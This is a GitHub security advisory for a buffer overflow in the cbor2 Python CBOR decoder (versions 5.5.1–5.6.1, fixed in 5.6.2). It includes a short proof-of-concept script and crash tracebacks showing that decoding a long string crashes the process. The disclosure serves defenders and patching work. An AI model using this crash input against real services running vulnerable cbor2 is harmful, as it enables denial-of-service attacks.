GHSA-375g-39jq-vq7m

Suggest an improvement
Source
https://github.com/advisories/GHSA-375g-39jq-vq7m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-375g-39jq-vq7m/GHSA-375g-39jq-vq7m.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-375g-39jq-vq7m
Aliases
Published
2024-02-21T00:09:03Z
Modified
2024-04-20T00:46:05.511737Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Potential buffer overflow in CBOR2 decoder
Details

Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

Details

PoC

import json
import concurrent.futures
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

print(test())
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: &lt;built-in function loads> returned NULL without setting an error

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

References

Affected packages

PyPI / cbor2

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
5.5.1
Fixed
5.6.2

Affected versions

5.*

5.5.1
5.6.0
5.6.1